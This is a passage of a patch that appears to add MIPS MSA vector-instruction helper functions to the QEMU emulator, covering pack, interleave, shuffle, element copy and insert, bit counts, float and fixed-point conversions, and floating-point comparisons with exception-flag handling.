uint32_t ws, uint32_t rt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_splat_df(df, pwd, pws, env->active_tc.gpr[rt]); +} + +#define MSA_DO_B MSA_DO(b) +#define MSA_DO_H MSA_DO(h) +#define MSA_DO_W MSA_DO(w) +#define MSA_DO_D MSA_DO(d) + +#define MSA_LOOP_B MSA_LOOP(B) +#define MSA_LOOP_H MSA_LOOP(H) +#define MSA_LOOP_W MSA_LOOP(W) +#define MSA_LOOP_D MSA_LOOP(D) + +#define MSA_LOOP_COND_B MSA_LOOP_COND(DF_BYTE) +#define MSA_LOOP_COND_H MSA_LOOP_COND(DF_HALF) +#define MSA_LOOP_COND_W MSA_LOOP_COND(DF_WORD) +#define MSA_LOOP_COND_D MSA_LOOP_COND(DF_DOUBLE) + +#define MSA_LOOP(DF) \ + for (i = 0; i < (MSA_LOOP_COND_ ## DF) ; i++) { \ + MSA_DO_ ## DF \ + } + +#define MSA_FN_DF(FUNC) \ +void helper_msa_##FUNC(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + wr_t wx, *pwx = &wx; \ + uint32_t i; \ + switch (df) { \ + case DF_BYTE: \ + MSA_LOOP_B \ + break; \ + case DF_HALF: \ + MSA_LOOP_H \ + break; \ + case DF_WORD: \ + MSA_LOOP_W \ + break; \ + case DF_DOUBLE: \ + MSA_LOOP_D \ + break; \ + default: \ + assert(0); \ + } \ + msa_move_v(pwd, pwx); \ +} + +#define MSA_LOOP_COND(DF) \ + (DF_ELEMENTS(DF) / 2) + +#define Rb(pwr, i) (pwr->b[i]) +#define Lb(pwr, i) (pwr->b[i + DF_ELEMENTS(DF_BYTE)/2]) +#define Rh(pwr, i) (pwr->h[i]) +#define Lh(pwr, i) (pwr->h[i + DF_ELEMENTS(DF_HALF)/2]) +#define Rw(pwr, i) (pwr->w[i]) +#define Lw(pwr, i) (pwr->w[i + DF_ELEMENTS(DF_WORD)/2]) +#define Rd(pwr, i) (pwr->d[i]) +#define Ld(pwr, i) (pwr->d[i + DF_ELEMENTS(DF_DOUBLE)/2]) + +#define MSA_DO(DF) \ + do { \ + R##DF(pwx, i) = pwt->DF[2*i]; \ + L##DF(pwx, i) = pws->DF[2*i]; \ + } while (0); +MSA_FN_DF(pckev_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + R##DF(pwx, i) = pwt->DF[2*i+1]; \ + L##DF(pwx, i) = pws->DF[2*i+1]; \ + } while (0); 
+MSA_FN_DF(pckod_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = L##DF(pwt, i); \ + pwx->DF[2*i+1] = L##DF(pws, i); \ + } while (0); +MSA_FN_DF(ilvl_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = R##DF(pwt, i); \ + pwx->DF[2*i+1] = R##DF(pws, i); \ + } while (0); +MSA_FN_DF(ilvr_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = pwt->DF[2*i]; \ + pwx->DF[2*i+1] = pws->DF[2*i]; \ + } while (0); +MSA_FN_DF(ilvev_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = pwt->DF[2*i+1]; \ + pwx->DF[2*i+1] = pws->DF[2*i+1]; \ + } while (0); +MSA_FN_DF(ilvod_df) +#undef MSA_DO +#undef MSA_LOOP_COND + +#define MSA_LOOP_COND(DF) \ + (DF_ELEMENTS(DF)) + +#define MSA_DO(DF) \ + do { \ + uint32_t n = DF_ELEMENTS(df); \ + uint32_t k = (pwd->DF[i] & 0x3f) % (2 * n); \ + pwx->DF[i] = \ + (pwd->DF[i] & 0xc0) ? 0 : k < n ? pwt->DF[k] : pws->DF[k - n]; \ + } while (0); +MSA_FN_DF(vshf_df) +#undef MSA_DO +#undef MSA_LOOP_COND +#undef MSA_FN_DF + +void helper_msa_sldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_sld_df(df, pwd, pws, n); +} + +void helper_msa_splati_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_splat_df(df, pwd, pws, n); +} + +void helper_msa_copy_s_df(CPUMIPSState *env, uint32_t df, uint32_t rd, + uint32_t ws, uint32_t n) +{ + n %= DF_ELEMENTS(df); + + switch (df) { + case DF_BYTE: + env->active_tc.gpr[rd] = (int8_t)env->active_fpu.fpr[ws].wr.b[n]; + break; + case DF_HALF: + env->active_tc.gpr[rd] = (int16_t)env->active_fpu.fpr[ws].wr.h[n]; + break; + case DF_WORD: + env->active_tc.gpr[rd] = (int32_t)env->active_fpu.fpr[ws].wr.w[n]; + break; +#ifdef TARGET_MIPS64 + case DF_DOUBLE: + env->active_tc.gpr[rd] = 
(int64_t)env->active_fpu.fpr[ws].wr.d[n]; + break; +#endif + default: + assert(0); + } +} + +void helper_msa_copy_u_df(CPUMIPSState *env, uint32_t df, uint32_t rd, + uint32_t ws, uint32_t n) +{ + n %= DF_ELEMENTS(df); + + switch (df) { + case DF_BYTE: + env->active_tc.gpr[rd] = (uint8_t)env->active_fpu.fpr[ws].wr.b[n]; + break; + case DF_HALF: + env->active_tc.gpr[rd] = (uint16_t)env->active_fpu.fpr[ws].wr.h[n]; + break; + case DF_WORD: + env->active_tc.gpr[rd] = (uint32_t)env->active_fpu.fpr[ws].wr.w[n]; + break; +#ifdef TARGET_MIPS64 + case DF_DOUBLE: + env->active_tc.gpr[rd] = (uint64_t)env->active_fpu.fpr[ws].wr.d[n]; + break; +#endif + default: + assert(0); + } +} + +void helper_msa_insert_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t rs_num, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong rs = env->active_tc.gpr[rs_num]; + + switch (df) { + case DF_BYTE: + pwd->b[n] = (int8_t)rs; + break; + case DF_HALF: + pwd->h[n] = (int16_t)rs; + break; + case DF_WORD: + pwd->w[n] = (int32_t)rs; + break; + case DF_DOUBLE: + pwd->d[n] = (int64_t)rs; + break; + default: + assert(0); + } +} + +void helper_msa_insve_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + switch (df) { + case DF_BYTE: + pwd->b[n] = (int8_t)pws->b[0]; + break; + case DF_HALF: + pwd->h[n] = (int16_t)pws->h[0]; + break; + case DF_WORD: + pwd->w[n] = (int32_t)pws->w[0]; + break; + case DF_DOUBLE: + pwd->d[n] = (int64_t)pws->d[0]; + break; + default: + assert(0); + } +} + +void helper_msa_ctcmsa(CPUMIPSState *env, target_ulong elm, uint32_t cd) +{ + switch (cd) { + case 0: + break; + case 1: + env->active_tc.msacsr = (int32_t)elm & MSACSR_MASK; + /* set float_status rounding mode */ + set_float_rounding_mode( + ieee_rm[(env->active_tc.msacsr & MSACSR_RM_MASK) >> MSACSR_RM], + &env->active_tc.msa_fp_status); + /* set float_status flush modes */ + 
set_flush_to_zero( + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0 ? 1 : 0, + &env->active_tc.msa_fp_status); + set_flush_inputs_to_zero( + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0 ? 1 : 0, + &env->active_tc.msa_fp_status); + /* check exception */ + if ((GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED) + & GET_FP_CAUSE(env->active_tc.msacsr)) { + helper_raise_exception(env, EXCP_MSAFPE); + } + break; + } +} + +target_ulong helper_msa_cfcmsa(CPUMIPSState *env, uint32_t cs) +{ + switch (cs) { + case 0: + return env->msair; + case 1: + return env->active_tc.msacsr & MSACSR_MASK; + } + return 0; +} + +void helper_msa_move_v(CPUMIPSState *env, uint32_t wd, uint32_t ws) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_move_v(pwd, pws); +} + +static inline int64_t msa_pcnt_df(uint32_t df, int64_t arg) +{ + uint64_t x; + + x = UNSIGNED(arg, df); + + x = (x & 0x5555555555555555ULL) + ((x >> 1) & 0x5555555555555555ULL); + x = (x & 0x3333333333333333ULL) + ((x >> 2) & 0x3333333333333333ULL); + x = (x & 0x0F0F0F0F0F0F0F0FULL) + ((x >> 4) & 0x0F0F0F0F0F0F0F0FULL); + x = (x & 0x00FF00FF00FF00FFULL) + ((x >> 8) & 0x00FF00FF00FF00FFULL); + x = (x & 0x0000FFFF0000FFFFULL) + ((x >> 16) & 0x0000FFFF0000FFFFULL); + x = (x & 0x00000000FFFFFFFFULL) + ((x >> 32)); + + return x; +} + +static inline int64_t msa_nlzc_df(uint32_t df, int64_t arg) +{ + uint64_t x, y; + int n, c; + + x = UNSIGNED(arg, df); + n = DF_BITS(df); + c = DF_BITS(df) / 2; + + do { + y = x >> c; + if (y != 0) { + n = n - c; + x = y; + } + c = c >> 1; + } while (c != 0); + + return n - x; +} + +static inline int64_t msa_nloc_df(uint32_t df, int64_t arg) +{ + return msa_nlzc_df(df, UNSIGNED((~arg), df)); +} + +void helper_msa_fill_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t rs) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = 
(int8_t)env->active_tc.gpr[rs]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = (int16_t)env->active_tc.gpr[rs]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = (int32_t)env->active_tc.gpr[rs]; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = (int64_t)env->active_tc.gpr[rs]; + } + break; + default: + assert(0); + } +} + +#define MSA_UNOP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_UNOP_DF(nlzc) +MSA_UNOP_DF(nloc) +MSA_UNOP_DF(pcnt) +#undef MSA_UNOP_DF + +#define FLOAT_ONE32 make_float32(0x3f8 << 20) +#define FLOAT_ONE64 make_float64(0x3ffULL << 52) + +#define FLOAT_SNAN16 (float16_default_nan ^ 0x0220) + /* 0x7c20 */ +#define FLOAT_SNAN32 (float32_default_nan ^ 0x00400020) + /* 0x7f800020 */ +#define FLOAT_SNAN64 (float64_default_nan ^ 0x0008000000000020ULL) + /* 0x7ff0000000000020 */ + +static inline void clear_msacsr_cause(CPUMIPSState *env) +{ + SET_FP_CAUSE(env->active_tc.msacsr, 0); +} + +static inline void check_msacsr_cause(CPUMIPSState *env) +{ + if ((GET_FP_CAUSE(env->active_tc.msacsr) & + (GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED)) == 
0) { + UPDATE_FP_FLAGS(env->active_tc.msacsr, + GET_FP_CAUSE(env->active_tc.msacsr)); + } else { + helper_raise_exception(env, EXCP_MSAFPE); + } +} + +/* Flush-to-zero use cases for update_msacsr() */ +#define CLEAR_FS_UNDERFLOW 1 +#define CLEAR_IS_INEXACT 2 +#define RECIPROCAL_INEXACT 4 + +static inline int update_msacsr(CPUMIPSState *env, int action, int denormal) +{ + int ieee_ex; + + int c; + int cause; + int enable; + + ieee_ex = get_float_exception_flags(&env->active_tc.msa_fp_status); + + /* QEMU softfloat does not signal all underflow cases */ + if (denormal) { + ieee_ex |= float_flag_underflow; + } + + c = ieee_ex_to_mips(ieee_ex); + enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; + + /* Set Inexact (I) when flushing inputs to zero */ + if ((ieee_ex & float_flag_input_denormal) && + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { + if (action & CLEAR_IS_INEXACT) { + c &= ~FP_INEXACT; + } else { + c |= FP_INEXACT; + } + } + + /* Set Inexact (I) and Underflow (U) when flushing outputs to zero */ + if ((ieee_ex & float_flag_output_denormal) && + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { + c |= FP_INEXACT; + if (action & CLEAR_FS_UNDERFLOW) { + c &= ~FP_UNDERFLOW; + } else { + c |= FP_UNDERFLOW; + } + } + + /* Set Inexact (I) when Overflow (O) is not enabled */ + if ((c & FP_OVERFLOW) != 0 && (enable & FP_OVERFLOW) == 0) { + c |= FP_INEXACT; + } + + /* Clear Exact Underflow when Underflow (U) is not enabled */ + if ((c & FP_UNDERFLOW) != 0 && (enable & FP_UNDERFLOW) == 0 && + (c & FP_INEXACT) == 0) { + c &= ~FP_UNDERFLOW; + } + + /* Reciprocal operations set only Inexact when valid and not + divide by zero */ + if ((action & RECIPROCAL_INEXACT) && + (c & (FP_INVALID | FP_DIV0)) == 0) { + c = FP_INEXACT; + } + + cause = c & enable; /* all current enabled exceptions */ + + if (cause == 0) { + /* No enabled exception, update the MSACSR Cause + with all current exceptions */ + SET_FP_CAUSE(env->active_tc.msacsr, + 
(GET_FP_CAUSE(env->active_tc.msacsr) | c)); + } else { + /* Current exceptions are enabled */ + if ((env->active_tc.msacsr & MSACSR_NX_MASK) == 0) { + /* Exception(s) will trap, update MSACSR Cause + with all enabled exceptions */ + SET_FP_CAUSE(env->active_tc.msacsr, + (GET_FP_CAUSE(env->active_tc.msacsr) | c)); + } + } + + return c; +} + +static inline int get_enabled_exceptions(const CPUMIPSState *env, int c) +{ + int enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; + return c & enable; +} + +static inline float16 float16_from_float32(int32 a, flag ieee STATUS_PARAM) +{ + float16 f_val; + + f_val = float32_to_float16((float32)a, ieee STATUS_VAR); + f_val = float16_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 15)) : f_val; +} + +static inline float32 float32_from_float64(int64 a STATUS_PARAM) +{ + float32 f_val; + + f_val = float64_to_float32((float64)a STATUS_VAR); + f_val = float32_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 31)) : f_val; +} + +static inline float32 float32_from_float16(int16_t a, flag ieee STATUS_PARAM) +{ + float32 f_val; + + f_val = float16_to_float32((float16)a, ieee STATUS_VAR); + f_val = float32_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 31)) : f_val; +} + +static inline float64 float64_from_float32(int32 a STATUS_PARAM) +{ + float64 f_val; + + f_val = float32_to_float64((float64)a STATUS_VAR); + f_val = float64_maybe_silence_nan(f_val); + + return a < 0 ? 
(f_val | (1ULL << 63)) : f_val; +} + +static inline float32 float32_from_q16(int16_t a STATUS_PARAM) +{ + float32 f_val; + + /* conversion as integer and scaling */ + f_val = int32_to_float32(a STATUS_VAR); + f_val = float32_scalbn(f_val, -15 STATUS_VAR); + + return f_val; +} + +static inline float64 float64_from_q32(int32 a STATUS_PARAM) +{ + float64 f_val; + + /* conversion as integer and scaling */ + f_val = int32_to_float64(a STATUS_VAR); + f_val = float64_scalbn(f_val, -31 STATUS_VAR); + + return f_val; +} + +static inline int16_t float32_to_q16(float32 a STATUS_PARAM) +{ + int32 q_val; + int32 q_min = 0xffff8000; + int32 q_max = 0x00007fff; + + int ieee_ex; + + if (float32_is_any_nan(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + /* scaling */ + a = float32_scalbn(a, 15 STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_overflow) { + float_raise(float_flag_inexact STATUS_VAR); + return (int32)a < 0 ? q_min : q_max; + } + + /* conversion to int */ + q_val = float32_to_int32(a STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_invalid) { + set_float_exception_flags(ieee_ex & (~float_flag_invalid) + STATUS_VAR); + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)a < 0 ? 
q_min : q_max; + } + + if (q_val < q_min) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int16_t)q_min; + } + + if (q_max < q_val) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int16_t)q_max; + } + + return (int16_t)q_val; +} + +static inline int32 float64_to_q32(float64 a STATUS_PARAM) +{ + int64 q_val; + int64 q_min = 0xffffffff80000000LL; + int64 q_max = 0x000000007fffffffLL; + + int ieee_ex; + + if (float64_is_any_nan(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + /* scaling */ + a = float64_scalbn(a, 31 STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_overflow) { + float_raise(float_flag_inexact STATUS_VAR); + return (int64)a < 0 ? q_min : q_max; + } + + /* conversion to integer */ + q_val = float64_to_int64(a STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_invalid) { + set_float_exception_flags(ieee_ex & (~float_flag_invalid) + STATUS_VAR); + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int64)a < 0 ? q_min : q_max; + } + + if (q_val < q_min) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)q_min; + } + + if (q_max < q_val) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)q_max; + } + + return (int32)q_val; +} + +#define MSA_FLOAT_COND(DEST, OP, ARG1, ARG2, BITS, QUIET) \ + do { \ + int c; \ + int64_t cond; \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + if (!QUIET) { \ + cond = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + } else { \ + cond = float ## BITS ## _ ## OP ## _quiet(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + } \ + DEST = cond ? 
M_MAX_UINT(BITS) : 0; \ + c = update_msacsr(env, CLEAR_IS_INEXACT, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +#define MSA_FLOAT_AF(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ + if ((DEST & M_MAX_UINT(BITS)) == M_MAX_UINT(BITS)) { \ + DEST = 0; \ + } \ + } while (0) + +#define MSA_FLOAT_UEQ(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_NE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_UNE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ + } \ + } \ + } while (0) + +#define MSA_FLOAT_ULE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_ULT(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_OR(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, le, ARG2, ARG1, BITS, QUIET); \ + } \ + } while (0) + +static inline void compare_af(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + 
switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_AF(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_AF(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_un(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], unordered, pws->w[i], pwt->w[i], 32, + quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], unordered, pws->d[i], pwt->d[i], 64, + quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_eq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], eq, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], eq, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ueq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UEQ(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UEQ(pwx->d[i], pws->d[i], pwt->d[i], 64, 
quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_lt(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], lt, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], lt, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ult(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_ULT(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_ULT(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_le(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], le, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], le, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ule(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + 
switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_ULE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_ULE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_or(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_OR(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_OR(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_une(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ne(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) { + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_NE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_NE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + 
